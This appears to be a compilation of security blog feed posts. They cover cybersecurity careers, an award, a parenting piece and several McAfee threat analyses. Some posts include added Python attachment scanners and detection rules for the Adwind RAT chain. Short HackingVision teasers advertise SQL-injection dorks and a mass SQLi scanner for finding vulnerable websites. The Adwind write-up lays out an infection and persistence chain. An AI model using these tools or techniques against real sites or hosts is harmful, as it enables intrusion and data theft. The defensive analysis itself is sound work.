But often that isn’t the case for teens, as they are indecisive and their knowledge of professions isn’t vast. They often miss out on plum prospects because, well, they were not aware of them or feel they may later hamper their family lives! I am going to do my bit for all the young ladies finishing school education this year – I am going to talk to you about choosing cybersecurity as a career option.

So girls, if you possess good reasoning power, enjoy ferreting out the source of the problem, are a natural at coding or are a serious video gamer, think cybersecurity.

Why Cybersecurity you ask? Let me present the facts.

  • Skills shortage

The National Association of Software and Services Companies (NASSCOM) recently estimated that India alone will need 1 million cybersecurity professionals by 2020 to meet the demands of its rapidly growing economy.

Demand for security professionals in India will increase in all sectors due to the unprecedented rise in the number of cyber-attacks, added NASSCOM. Despite having the largest information technology talent pool in the world, India is struggling to produce an adequate number of professionals to close the cybersecurity skill gap.

  • The age of diversification

There is a gender gap in the cybersecurity sector, and companies globally are trying to correct this, not just to promote diversity but to add value to their work culture with the visions, perspectives and skills that women bring.

  • Flexible work arrangements

With more women joining the profession, employers are doing their best to make the work atmosphere favourable for them. Not only are they offering flexi-timings but also work-from-home opportunities when it’s possible. I have heard of companies that allow mothers with infants to work from home for extended periods! Isn’t that a blessing?

According to a 2013 McKinsey Report, 34 percent of India’s IT workforce is female. However, most of them exit the employment pipeline at the junior to mid-level.

This only goes to reveal that many women scientists and engineers drop out, perhaps because they find it difficult to manage their work-home balance. With flexi-timings and work-from-home options, this attrition will definitely decrease!

  • Good support system

Great news for all women exploring cybersecurity as a career! There are organizations like Women in CyberSecurity (WiCyS) that aim to offer a common platform to women cybersecurity professionals from academia, research and industry, where they can network, mentor and be mentored, and share information and experience; which means you will never feel alone, as help is just a click away!

  • You don’t need to be an engineer

Employers are trying to plug the cybersecurity skills gap with alternative solutions. It has been found that video gamers too have the right types of skills along with a different approach to threat hunting. So, if you are an avid gamer, go for it!

  • Steady jobs with good pay

This last bit is the clincher really! In this super-competitive market, isn’t it a dream to have a high salary job that rarely gets monotonous?

McAfee lists some cool cybersecurity job prospects for you; check them out!

Job 1 – Forensics Expert

They analyze and determine who the mastermind behind a security breach might be. It can be almost as complex and precise as understanding human DNA.

Job 2 – Cryptographer/Cryptanalyst

Cryptographers develop algorithms, ciphers and security systems to encrypt and hide sensitive information from cyber hackers.

Job 3 – Threat Hunter

Threat hunters use manual or machine-assisted skills to detect and prepare for security incidents.

Job 4 – Security Architect

They design systems to help a business find and test its security vulnerabilities.

Parenting tips to rear future cyber security experts:

You can help your child make faster career decisions if you instill security habits in them from an early age. It goes without saying that you need to model cybersecurity habits so that they can learn by imitating you. Discuss cybersecurity as a profession and explore the prospects together online. Take your child to meet friends in the field so that they can get their doubts cleared. Have dinner time conversations on how attacks are becoming more advanced and the best means to fight them. If your daughter enjoys playing online games, use that as a conversation starter to talk about how security firms are looking at video gamers—even those without a background in cybersecurity.

The best gift you can give the women in your family on International Women’s Day is a sense of independence, security and equality.

Happy International Women’s Day!!

Credits:

  • https://anitab.org/blog/indian-women-in-technology-barriers/
  • CSO
  • McAfee

The post Let’s Discuss Cybersecurity as a Career Option This International Women’s Day appeared first on McAfee Blogs.

What is an IT auditor? A vital role for risk assessment

What is an IT auditor?

An IT auditor is responsible for analyzing and assessing a company’s technological infrastructure to ensure processes and systems run accurately and efficiently, while remaining secure and meeting compliance regulations. An IT auditor also identifies any IT issues that fall under the audit, specifically those related to security and risk management. If issues are identified, IT auditors are responsible for communicating their findings to others in the organization and offering solutions to improve or change processes and systems to ensure security and compliance.

Cloudbric Wins “Hot Company Website Security” at the InfoSec Awards 2019

On March 4, Cyber Defense Magazine announced the winners of the 7th Annual Coveted Information Security Awards during the RSA Conference 2019. Cloudbric was selected as the Hot Company winner for Website Security.

Cyber Defense Magazine (CDM), the industry’s leading electronic information security magazine, has spent the past six months scouring the globe and found nearly 3,000 companies who create and offer the most respected information security products and services.

Cloudbric was honored for their Website Security, which boasts an award-winning WAF, DDoS Protection, and SSL as a full service package for small and medium-sized businesses who are looking for a more proactive solution to emerging cyber threats. 

“We’re thrilled to have won the Hot Company award from Cyber Defense Magazine as a recognition of our website security services. Cloudbric aims to proudly emerge as a household name within the website security industry and hope to lead the way for SMB security,” said TJ Jung, Chief Executive Officer of Cloudbric.

“While nation state exploitation, Cybercrime, Hacktivism, Cyberespionage, Ransomware and malware exploits are all on the rise, Cloudbric has won the Hot Company Website Security InfoSec Award from our magazine. They won after we reviewed nearly 3,000 infosec companies, globally, because they are an innovator on a mission to help stop breaches and get one step ahead of these threats, proactively,” said Gary S. Miliefsky, Publisher, Cyber Defense Magazine.

The full list of winners can be found at www.cyberdefenseawards.com.

About CDM InfoSec Awards

This is Cyber Defense Magazine’s seventh year of honoring InfoSec innovators. Submission requirements are for any startup, early stage, later stage or public companies in the INFORMATION SECURITY (INFOSEC) space who believe they have a unique and compelling value proposition for their product or service. Learn more at www.cyberdefenseawards.com.

About the Judging

The judges are CISSP-, FMDHS- and CEH-certified security professionals who voted based on their independent review of the materials each company submitted on the website, including but not limited to data sheets, white papers, product literature and other market variables. CDM has a flexible philosophy: it would rather find more innovative players with new and unique technologies than the one with the most customers or money in the bank. CDM is always asking “What’s Next?” when looking for Next Generation InfoSec Solutions.

About Cyber Defense Magazine

With over 1.4 Million annual readers and growing, and over 7,000 pages of searchable online infosec content, Cyber Defense Magazine is the premier source of IT Security information. They are managed and published by and for ethical, honest, passionate information security professionals. Their mission is to share cutting-edge knowledge, real-world stories and awards on the best ideas, products and services in the information technology industry. We deliver electronic magazines every month online for free, and limited print editions exclusively for the RSA conferences and paid subscribers. CDM is a proud member of the Cyber Defense Media Group. Learn more at www.cyberdefensemagazine.com and visit www.cyberdefensetv.com and www.cyberdefenseradio.com to see and hear some of the most informative interviews of many of these winning company executives.

The post Cloudbric Wins “Hot Company Website Security” at the InfoSec Awards 2019 appeared first on Cloudbric.

Google Dorks List 2019 SQLi Dorks – HackingVision

Google Dorks List 2019 SQLi Dorks Google Dorks List 2019, Google Dorks List, Find SQL Injectable Websites, Hack Websites using Google Dorks, Google Dorks List SQL Injection. Google Dorks List 2019 is a list of dorks to find SQL injectable websites. A Google dork query, sometimes just referred to as a dork, is a search […]

The post Google Dorks List 2019 SQLi Dorks – HackingVision appeared first on HackingVision.

McAfee Protects Against Suspicious Email Attachments

Email remains a top vector for attackers. Over the years, defenses have evolved, and policy-based protections have become standard for email clients such as Microsoft Outlook and Microsoft Mail. Such policies are highly effective, but only if they are maintained, as attackers keep changing their tactics to evade defenses. For this reason, McAfee endpoint products use a combination of product features and content for increased agility. In McAfee Endpoint Security (ENS) 10.5+, such protection is enabled via the ‘Detect suspicious email attachments’ option and maintained through DAT content. This capability goes beyond the level of protection offered by email clients by blocking not only applications and scripts but also a variety of threat types in their native form, as well as those compressed and contained within archives and other formats.

Figure 1 – ENS 10.6.1 Configuration Screen

An example of this capability in action can be seen against a recent spam run.

In this campaign, a malicious email message contained the attachment BANK DETAILS.ZIP.  Inside this archive was the file BANK DETAILS.ISO.  Malicious ISO spam has been increasing over the past six months, and while it is common for ISO files to be blocked by email clients, this is not the case where the ISO is inside of a ZIP.  Inside the BANK DETAILS.ISO file resides BANK DETAILS.EXE.  Email clients will typically block executable files attached to messages, but not if they are inside a container.

When the email client attempts to write the attachment to disk, ENS scans inside the ZIP and subsequently the contained ISO and EXE files (ZIP -> ISO -> EXE).
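To illustrate why a content-based scan catches what an extension-only policy misses, here is an added example (not McAfee's or ENS's code): a small Python inspector that classifies an attachment by magic bytes, recurses into ZIP members, and probes an ISO image sector by sector for a PE header. The block-list set, the ISO probing heuristic (a stand-in for a real ISO 9660 directory walk) and the ZIP -> ISO -> EXE sample built in `build_sample` are all constructed assumptions.

```python
from __future__ import annotations

import io
import struct
import zipfile
from dataclasses import dataclass

# Content signatures used to identify a blob regardless of the name it carries.
ZIP_MAGIC = b"PK\x03\x04"
ISO_PVD_OFFSET = 0x8000      # ISO 9660 primary volume descriptor lives at sector 16
ISO_SECTOR = 2048
ISO_SIGNATURE = b"CD001"     # found at byte 1 of the volume descriptor

# Constructed stand-in for an email client's extension block list.
CLIENT_BLOCKED_EXTENSIONS = {".exe", ".scr", ".js", ".vbs", ".iso"}

MAX_DEPTH = 8                       # bound recursion on nested containers
MAX_MEMBER_SIZE = 50 * 1024 * 1024  # refuse to inflate oversized members (zip-bomb guard)


@dataclass
class Finding:
    path: str    # container chain, e.g. "BANK DETAILS.ZIP/BANK DETAILS.ISO/<pe@0x9000>"
    kind: str    # "zip", "iso", "pe", "oversized" or "other"
    depth: int   # 0 = the attachment itself


def is_pe(data: bytes, off: int = 0) -> bool:
    """True if a PE (Windows executable) header starts at offset `off`."""
    if data[off:off + 2] != b"MZ" or len(data) < off + 0x40:
        return False
    e_lfanew = struct.unpack_from("<I", data, off + 0x3C)[0]
    sig = off + e_lfanew
    return data[sig:sig + 4] == b"PE\x00\x00"


def identify(data: bytes) -> str:
    """Classify a blob by magic bytes, not by filename."""
    if data.startswith(ZIP_MAGIC):
        return "zip"
    pvd = ISO_PVD_OFFSET + 1
    if data[pvd:pvd + len(ISO_SIGNATURE)] == ISO_SIGNATURE:
        return "iso"
    if is_pe(data):
        return "pe"
    return "other"


def client_policy_blocks(filename: str) -> bool:
    """Extension-only check, applied to the top-level attachment name only."""
    return any(filename.lower().endswith(ext) for ext in CLIENT_BLOCKED_EXTENSIONS)


def scan(name: str, data: bytes, depth: int = 0) -> list[Finding]:
    """Recursively classify `data` and whatever it contains."""
    kind = identify(data)
    findings = [Finding(name, kind, depth)]
    if depth >= MAX_DEPTH:
        return findings
    if kind == "zip":
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            for info in zf.infolist():
                if info.is_dir():
                    continue
                member = f"{name}/{info.filename}"
                if info.file_size > MAX_MEMBER_SIZE:
                    findings.append(Finding(member, "oversized", depth + 1))
                    continue
                findings.extend(scan(member, zf.read(info), depth + 1))
    elif kind == "iso":
        # Heuristic (assumption) in place of an ISO 9660 directory walk: file data in
        # an image is sector-aligned, so probe each sector after the descriptors.
        for off in range(ISO_PVD_OFFSET + ISO_SECTOR, len(data), ISO_SECTOR):
            if is_pe(data, off):
                findings.append(Finding(f"{name}/<pe@{off:#x}>", "pe", depth + 1))
    return findings


LABEL = {"zip": "ZIP", "iso": "ISO", "pe": "EXE"}


def verdict(filename: str, data: bytes) -> dict:
    """Compare the extension-only decision with the content-based one."""
    findings = scan(filename, data)
    return {
        "client_extension_block": client_policy_blocks(filename),
        "content_scan_block": any(f.kind == "pe" for f in findings),
        "chain": " -> ".join(LABEL[f.kind] for f in findings if f.kind in LABEL),
    }


def build_sample() -> tuple[str, bytes]:
    """Constructed stand-in for the campaign's attachment: ZIP -> ISO -> EXE.
    The 'EXE' is a bare PE header, not a working program."""
    fake_pe = b"MZ" + b"\x00" * 0x3A + struct.pack("<I", 0x40) + b"PE\x00\x00" + b"\x00" * 20
    iso = bytearray(ISO_PVD_OFFSET + 3 * ISO_SECTOR)
    iso[ISO_PVD_OFFSET:ISO_PVD_OFFSET + 6] = b"\x01" + ISO_SIGNATURE   # primary volume descriptor
    start = ISO_PVD_OFFSET + 2 * ISO_SECTOR
    iso[start:start + len(fake_pe)] = fake_pe
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("BANK DETAILS.ISO", bytes(iso))
    return "BANK DETAILS.ZIP", buf.getvalue()
```

Running `verdict(*build_sample())` shows the gap the post describes: the extension check passes the ZIP, while the content scan reports the chain ZIP -> ISO -> EXE and blocks it.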

Figure 2 – ENS Toaster Popup

In this case, 2-year-old DAT content proactively stopped the threat.

If the system had not been protected, an unsuspecting user might open the ZIP to reveal the ISO.

Figure 3 – Inside ZIP file showing ISO file

The ISO can then be accessed via Windows Explorer, where it appears as a DVD drive containing the executable, password-stealing payload.

Figure 4 – EXE file inside Bank Details.ISO

Since the advent of policy-based email attachment blocking, attackers have continued to seek ways to evade that protection. ISO abuse may be the latest chapter in the story, but others are sure to follow.

Tens of thousands of new and unique malicious attachments are blocked each month via the ‘Suspicious Attachment’ detection feature.

The post McAfee Protects Against Suspicious Email Attachments appeared first on McAfee Blogs.

Weekly Update 128

I'm not intentionally pushing these out later than usual, but events have just been such over the last few weeks that it's worked out that way. This one really is a short one though as there hasn't been a lot of newsworthy stuff going on this week, other than the new Instamics I picked up which are rather cool. The audio recording did work well (I mentioned in the video I wasn't sure if it was functioning correctly), and it's pretty damn good quality for what it is. Certainly better than my old Rode lapel mic, but obviously not up to the standard of the Electro-Voice I use for professional recording.

Next week I expect I'll be a little more organised and have some more content but until then, here's a succinct 14 minutes worth of what's new on my side:

References

  1. I bought some Instamics (these are very cool units, but the firmware update process is worrying)
  2. We've got a free NDC meetup in Melbourne soon (Brisbane sold out early and Melbourne looks like doing the same)
  3. We're bringing NDC to New York! (I'll be there doing workshops and talks)
  4. I loaded the Dubsmash data breach into HIBP (also just pushed the button on ShareThis)
  5. Varonis is sponsoring my blog this week (more from them on their DFIR team investigating a cyberattack)

25 Free eBooks to learn Python 2019 – HackingVision

Free eBooks list of free Python programming eBooks to learn Python programming. Download eBooks in PDF EPUB 2019 Python eBooks. List curated by Hackingvision.com Disclaimer: The contributor(s) cannot be held responsible for any misuse of the data. This repository is just a collection of URLs to download eBooks for free. Download the eBooks at your […]

The post 25 Free eBooks to learn Python 2019 – HackingVision appeared first on HackingVision.

Alleged ‘Momo Challenge’ Reminds Parents to Monitor Online Content

This eerie image is connected to the alleged Momo challenge causing panic among parents.

Editor’s Note: This blog post includes disturbing content and mentions of suicide.

Internet challenges have been going on for years. They can be fun and harmless, or they can be dim-witted and even deadly. The latest challenge referred to as the Momo challenge seemingly hits a whole new level of creepy but experts say there’s little evidence the challenge is real.

What Is It?

To participate in the alleged challenge, players using various apps or games are purportedly urged by a pop-up image of “Momo” to hurt themselves or others to avoid being cursed by the creature. (The creepy image of Momo is reportedly a half-girl, half-bird sculpture created by a Japanese artist unrelated to the game.) Rumors allege the game ends with Momo encouraging participants to take their own lives and record it for social media.

Real or rumor?

Is the challenge real or a hoax? While several youth suicides around the world are rumored to be tied to the Momo game, none of the connections have been proven, according to the Washington Post, Snopes, and other news sources.

Rumored or reality, one thing is for certain: The viral Momo story is creating a genuine panic and perceived threat among parents that requires an equally strategic response.

With devices in the hands of most kids by the time they are 10, the viral Momo challenge offers all of us a chance to stop, think, and connect with our kids specifically about digital content, peer pressure, and the danger of online challenges.

Talking Points for Families

Be hands-on. This story, while considered an internet myth, represents an opportunity to get even more hands-on with your digital parenting efforts. As silly, viral challenges like Momo arise (and there will be more), resolve to routinely monitor the content your kids engage with online. This includes apps, YouTube content, video games, TV shows online, and chat apps. Feel overwhelmed with monitoring? Consider getting a software program to be your eyes and ears online and help filter out risky content.

Get proactive. Depending on the age of your child, chances are if they’ve heard about the Momo game or seen the image, they could be frightened. Talk about the dangers of peer pressure, bullying, and online challenges. Make sure the conversation is two-way and includes your child’s experiences and thoughts on the topic. Ask your child to come to you immediately if anyone or anything online ever makes them feel unsafe, afraid, or provoked.

Stay informed. Risky digital behaviors that affect kids, tweens, and teens make the headlines each week. Any parent in the know will tell you candidly that staying informed about online risk is a part-time job attached to parenting. Read blogs, set Google Alerts, listen to podcasts, and connect with experts online to stay informed. Other dangerous online challenges include the Bird Box Challenge and several others.

Encourage critical thinking. If your child blows off the potential seriousness of online stunts or games, encourage him or her to think a behavior through. Ask them: “Walk through each step of the stunt and tell me where you think things could go wrong.” This will help your child personally determine if an activity is risky or not.

Know Those Apps! One of the biggest threats to a child’s online safety is his or her choice in apps. Apps run the gamut of risk and range from educational and uplifting to inappropriate and dangerous. Go on your child’s phone regularly and check for risky apps. Google the app and read app reviews. Look at age restrictions and customer reviews so you will be better equipped to evaluate whether an app may be suitable for your child. Dangerous apps include Kik Messenger, Ask.Fm, Tumblr, and any other social network that allows anonymous users.

Monitor online communities. Your kids have friends they bring home, but they also have friends online you will never meet face to face. Dig in and get curious. Look for apps such as WhatsApp or Kik that allow kids to chat with anyone, anywhere. Ask your kids to show you where they spend their time and the kind of people they choose to talk with. Remember: the direct message features on favorite apps like Instagram and Snapchat are also ways kids connect with peers online.

The contour of our digital life evolves and expands every day. And, unfortunately, along with that growth will come people who attempt to cause harm or plant fear just for sport. Rather than respond with fear, consider approaching risks with a fresh determination to equip your family with the knowledge and tools it needs to thrive and stay safe in this ever-changing digital terrain.

The post Alleged ‘Momo Challenge’ Reminds Parents to Monitor Online Content appeared first on McAfee Blogs.

Cyber Security Roundup for February 2019

The perceived threat posed by Huawei to UK national infrastructure continued to make headlines throughout February, as politicians, UK government agencies and the Chinese telecoms giant played out their rather public spat in the media. See my post Is Huawei a Threat to UK National Security? for further details, including why DDoS might be a greater threat to 5G than Huawei-supplied network devices.

February was a rather quiet month for hacks and data breaches in the UK: Mumsnet reported a minor data breach following a botched upgrade, and that was about it. The month was a busy one for security updates, with Microsoft, Adobe and Cisco all releasing high numbers of patches to fix various security vulnerabilities, including several released outside their scheduled monthly patch cycles.

A survey by PCI Pal concluded that a data breach has a greater impact in the UK than in the United States, in that UK customers are more likely to abandon a company that has let them down through a data breach. Reputational impact should always be taken into account when risk-assessing security.


Another survey of interest was conducted by Nominet, who polled 408 Chief Information Security Officers (CISOs) at midsize and large organisations in the UK and the United States. A whopping 91% of the respondents admitted to experiencing high to moderate levels of stress, with 26% saying the stress had led to mental and physical health issues, and 17% saying they had turned to alcohol. The contributing factors for this stress were job security, inadequate budget and resources, and a lack of support from the board and senior management. A CISO role can certainly be a poisoned chalice, so it's really no surprise most CISOs don't stay put for long.

A Netscout Threat Landscape Report found that in the second half of 2018 both cyber attacks against IoT devices and DDoS attacks rose dramatically. Fuelled by the compromise of large numbers of IoT devices, DDoS attacks in the 100 Gbps to 200 Gbps range increased 169%, while those in the 200 Gbps to 300 Gbps range exploded by 2,500%. The report concluded that cybercriminals had built and used cheaper, easier-to-deploy and more persistent malware, and that cyber gangs had achieved this higher level of efficiency by adopting the same principles used by legitimate businesses. These improvements have helped malicious actors greatly increase the number of medium-sized DDoS attacks while infiltrating IoT devices even more quickly.

In a rare speech, Jeremy Fleming, the head of GCHQ, warned the internet could deteriorate into "an even less governed space" if the international community doesn't come together to establish a common set of principles. He said "China, Iran, Russia and North Korea" had broken international law through cyber attacks, and made the case for when "offensive cyber activities" were good, saying "their use must always meet the three tests of legality, necessity and proportionality. Their use, in particular to cause disruption or damage - must be in extremis". Clearly international law wasn't developed with cyberspace in mind, so it looks like GCHQ is attempting to raise awareness to remedy that.

I will be speaking at the e-crime Cyber Security Congress in London on 6th March 2019, on cloud security, new business metrics, future risks and priorities for 2019 and beyond.

Finally, completely out of the blue, I was informed by 4D that this blog had been picked by a team of their technical engineers and directors as one of the best cyber security blogs in the UK (The 6 Best Cyber Security Blogs - A Data Centre's Perspective). Truly humbled and in great company to be on that list.


    SQLiv – Massive SQL injection scanner

    SQLiv – Massive SQL injection scanner. Features:

    • multiple domain scanning with SQL injection dork by Bing, Google, or Yahoo
    • targeted scanning by providing a specific domain (with crawling)
    • reverse domain scanning
    • both SQLi scanning and domain info checking are done in multiprocessing, so the script is super fast at scanning many […]

    The post SQLiv – Massive SQL injection scanner appeared first on HackingVision.

    JAVA-VBS Joint Exercise Delivers RAT

    The Adwind remote administration tool (RAT) is a Java-based backdoor Trojan that targets the various platforms on which Java runs. For an infection to occur, the user must typically execute the malware by double-clicking the .jar file, which usually arrives as an email attachment; infection requires the Java Runtime Environment to be installed. Once the malicious .jar file runs on the target system, the malware silently installs itself and connects to a remote server through a preconfigured port, from which it receives commands from the remote attacker and performs further malicious activity. Recently, McAfee Labs has seen a surge in a variant that arrives as a JAR attachment via spam email and uses the well-known Houdini VBS worm to infect users.

    Infection chain:

    The malware’s spreading mechanism is the same as in previous versions: it arrives in a spam email with a .jar attachment, whose contents are carefully crafted to lure victims using social engineering techniques. The whole infection chain is summarised in the snippet below:

     

    The spam email may look like this:

    The parent JAR file:

    To keep things simple, we refer to the attached .jar file as the parent JAR file and name it Sample.jar. Adwind generally arrives in obfuscated form to hide its malicious intent: its payload and configuration file (which serves as an installation file) are encrypted with the DES, RC4 or RC6 cipher, depending on the variant, and the backdoor decrypts itself on the fly during execution. In this variant the contents of Manifest.MF show the main class bogjbycqdq.Mawbkhvaype.

    Mawbkhvaype.class

    The main task of this class is to check for a resource file in the JAR bundle. Here, the resource mzesvhbami is a VBS file. Mawbkhvaype.class checks for mzesvhbami in the resource section, drops it as bymqzbfsrg.vbs in the user’s Home directory, and executes it with wscript.

    Bymqzbfsrg.vbs

    It contains a huge chunk of obfuscated, base64-encoded data. The snippet below shows part of the Bymqzbfsrg.vbs script.

    Once deobfuscated and decoded, the base64 data becomes ntfsmgr.jar, which is dropped in %appdata%/Roaming. The snippet below shows the conversion of the base64 data into a JAR file:

    Decoded to JAR file (ntfsmgr.jar)
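The chain described so far (manifest main class, a VBS resource inside the JAR, a base64 blob in that script that decodes to the next-stage JAR) is mechanical enough to automate. The following is an added triage script in Python; it is not McAfee's code and it does not decrypt Adwind's DES/RC4/RC6-protected payloads, it only walks the plaintext layers the post describes. The sample JAR is constructed inline: the file and class names follow the post (bogjbycqdq.Mawbkhvaype, mzesvhbami, operational.Jrat), the bytes are synthetic, and the VBS marker strings and base64 run length are heuristics chosen here.

```python
import base64
import binascii
import io
import re
import zipfile

SCRIPT_MARKERS = (b"ExecuteGlobal", b"CreateObject", b"WScript")
ZIP_MAGIC = b"PK\x03\x04"
# A dropped stage carried as text: long runs of base64 characters inside the script.
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{100,}={0,2}")


def read_main_class(jar_bytes):
    """Main-Class from META-INF/MANIFEST.MF, or None if the archive has no manifest."""
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as zf:
        try:
            manifest = zf.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
        except KeyError:
            return None
    for line in manifest.splitlines():
        if line.lower().startswith("main-class:"):
            return line.split(":", 1)[1].strip()
    return None


def find_script_resources(jar_bytes):
    """Names of non-class resources that look like VBScript (the Houdini stage hidden in the JAR)."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir() or info.filename.endswith(".class") or info.filename.startswith("META-INF/"):
                continue
            blob = zf.read(info)
            if any(marker in blob for marker in SCRIPT_MARKERS):
                hits.append(info.filename)
    return hits


def carve_base64_jars(script_bytes):
    """Decode each long base64 run in a script and keep the ones that decode to a ZIP/JAR."""
    jars = []
    for match in B64_RUN.finditer(script_bytes):
        try:
            decoded = base64.b64decode(match.group(0), validate=True)
        except (binascii.Error, ValueError):
            continue
        if decoded.startswith(ZIP_MAGIC):
            jars.append(decoded)
    return jars


def triage(jar_bytes, depth=0, max_depth=3):
    """Walk the JAR -> VBS resource -> base64 -> JAR chain and report each stage."""
    report = {"main_class": read_main_class(jar_bytes), "script_resources": [], "dropped_jars": []}
    if depth >= max_depth:
        return report
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as zf:
        for name in find_script_resources(jar_bytes):
            report["script_resources"].append(name)
            for inner in carve_base64_jars(zf.read(name)):
                report["dropped_jars"].append(triage(inner, depth + 1, max_depth))
    return report


def build_sample():
    """Constructed stand-in for Sample.jar: names follow the post, contents are synthetic."""
    inner = io.BytesIO()
    with zipfile.ZipFile(inner, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\r\nMain-Class: operational.Jrat\r\n")
        zf.writestr("operational/Jrat.class", b"\xca\xfe\xba\xbe" + b"\x00" * 60)
    stage2 = base64.b64encode(inner.getvalue()).decode("ascii")
    # Stand-in for bymqzbfsrg.vbs: the base64 blob plus the dynamic-execution call the post describes.
    vbs = f'Dim blob: blob = "{stage2}"\r\nExecuteGlobal naira(blob)\r\n'.encode("ascii")
    outer = io.BytesIO()
    with zipfile.ZipFile(outer, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\r\nMain-Class: bogjbycqdq.Mawbkhvaype\r\n")
        zf.writestr("bogjbycqdq/Mawbkhvaype.class", b"\xca\xfe\xba\xbe" + b"\x00" * 16)
        zf.writestr("mzesvhbami", vbs)
    return outer.getvalue()


if __name__ == "__main__":
    import json
    print(json.dumps(triage(build_sample()), indent=2))
```

Real samples obfuscate the VBS before the base64 layer, so on a live Bymqzbfsrg.vbs the carve step runs after deobfuscation; the point of the script is the ordering of checks (manifest, then non-class resources, then decoded payloads), which is the same whatever the per-sample encoding is.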

    Ntfsmgr.jar

    The important files in ntfsmgr.jar are drop.box, mega.download and sky.drive, which are used later to create the malware’s configuration file.

    Final Payload:

    Ntfsmgr.jar has operational.Jrat as its main class. The purpose of operational.Jrat is to drop another .jar file into the %TEMP% folder with a random file name of the form [underscore][dot][random numbers][dot]class, e.g. _0.1234567897654265678.class; this is the actual payload, which later performs the malicious activity on the user’s system. The snippet below shows the routine in operational.Jrat that creates the final payload in %TEMP%.

    The contents of its Manifest.MF look much like those of ntfsmgr.jar. All the other files in the final Java archive are decrypted on the fly and infect the system. After Adwind successfully infects a system, we have seen it log keystrokes, modify and delete files, download and execute further malware, take screenshots, access the system’s camera, take control of the mouse and keyboard, update itself, and more. We will not dig further into that side of the threat here, but you can read more about Adwind here and here. In this blog we will now discuss the other part of the story, Bymqzbfsrg.vbs.

    Working of Bymqzbfsrg.vbs

    After successful execution, Bymqzbfsrg.vbs drops ntfsmgr.jar and sKXoevtgAv.vbs in %appdata%/Roaming.

    Bymqzbfsrg.vbs dynamically executes a method named naira inside the script by using ExecuteGlobal, as seen in the snippet below:

    Dynamic execution of the script looks like this:

    The snippet below shows the script dropping sKXoevtgAv.vbs in %appdata%/Roaming.

    Here we see the script dropping ntfsmgr.jar in %appdata%/Roaming.

    At execution time, sKXoevtgAv.vbs decodes itself into the Houdini VBS worm, which is the final payload. The first few lines of the script are as follows:

    The attacker may perform many malicious activities on the victim’s machine, including:

    • Downloading and executing files on the victim’s machine
    • Running command instructions
    • Updating or uninstalling a copy of itself
    • Downloading and uploading files
    • Deleting a file or folder
    • Terminating certain processes
    • Enumerating files and folders on the victim’s machine

    Additional Points:

    1. For persistence it creates a Run entry.

    When ntfsmgr.jar runs, it adds itself to start-up so that it runs whenever the system starts.

    2. It checks for installed anti-malware products on the system.

    3. If available, it copies the installed Java Runtime files to a temporary directory within the victim’s home directory; otherwise it downloads them from the web and copies them to the same directory.
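The behavioural chain above (a Java process handing a .vbs from the user's profile to wscript, the script launching a .jar from %appdata%/Roaming, and a Run value that points at a .jar) is what an endpoint telemetry rule can key on, independent of the per-sample names. Here is an added example in Python of such rules run over constructed Sysmon-style events (EventID 1 process creation, EventID 13 registry value set); it is not McAfee's detection logic, the field names follow Sysmon's but only those used here are modelled, and the Java install path, user name and SID in the sample events are invented.

```python
import re

JAVA_IMAGES = {"java.exe", "javaw.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# A .vbs launched from somewhere under a user profile (the post: dropped in the user's Home directory).
USER_PROFILE_VBS = re.compile(r"\\Users\\[^\\]+\\.*?\.vbs\b", re.IGNORECASE)
# A .jar executed from the roaming profile or the temp folder (the post: %appdata%/Roaming and %TEMP%).
STAGED_JAR = re.compile(r'\\AppData\\(Roaming|Local\\Temp)\\[^"]*\.jar\b', re.IGNORECASE)
RUN_KEY = re.compile(r"\\Microsoft\\Windows\\CurrentVersion\\Run\\", re.IGNORECASE)
JAR_REF = re.compile(r"\.jar\b", re.IGNORECASE)


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def rule_java_spawns_script_host(ev):
    """Stage 1: the parent JAR's class hands the dropped .vbs to wscript."""
    return (ev.get("EventID") == 1
            and basename(ev["ParentImage"]) in JAVA_IMAGES
            and basename(ev["Image"]) in SCRIPT_HOSTS
            and USER_PROFILE_VBS.search(ev["CommandLine"]) is not None)


def rule_java_runs_staged_jar(ev):
    """Stage 2: the script starts the decoded ntfsmgr.jar from the roaming profile."""
    return (ev.get("EventID") == 1
            and basename(ev["Image"]) in JAVA_IMAGES
            and STAGED_JAR.search(ev["CommandLine"]) is not None)


def rule_run_key_points_at_jar(ev):
    """Stage 3: persistence through a Run value whose data launches a .jar."""
    return (ev.get("EventID") == 13
            and RUN_KEY.search(ev["TargetObject"]) is not None
            and JAR_REF.search(ev["Details"]) is not None)


RULES = {
    "java_spawns_script_host": rule_java_spawns_script_host,
    "java_runs_staged_jar": rule_java_runs_staged_jar,
    "run_key_points_at_jar": rule_run_key_points_at_jar,
}


def evaluate(events):
    """(rule name, event index) for every rule that fires on every event."""
    return [(name, i) for i, ev in enumerate(events) for name, rule in RULES.items() if rule(ev)]


def stages_seen(events):
    """Distinct chain stages observed; all three on one host is the high-confidence signal."""
    return len({name for name, _ in evaluate(events)})


JAVAW = r"C:\Program Files\Java\jre1.8.0_201\bin\javaw.exe"   # assumed install path
# Constructed Sysmon-style events; only the field names used above are modelled.
SAMPLE_EVENTS = [
    {"EventID": 1, "ParentImage": JAVAW, "Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r'"C:\Windows\System32\wscript.exe" "C:\Users\alice\bymqzbfsrg.vbs"'},
    {"EventID": 1, "ParentImage": r"C:\Windows\System32\wscript.exe", "Image": JAVAW,
     "CommandLine": f'"{JAVAW}" -jar "C:\\Users\\alice\\AppData\\Roaming\\ntfsmgr.jar"'},
    {"EventID": 13, "Image": JAVAW,
     "TargetObject": r"HKU\S-1-5-21-1111\Software\Microsoft\Windows\CurrentVersion\Run\ntfsmgr",
     "Details": f'"{JAVAW}" -jar "C:\\Users\\alice\\AppData\\Roaming\\ntfsmgr.jar"'},
    # Benign control: a developer running a build artefact from a project folder.
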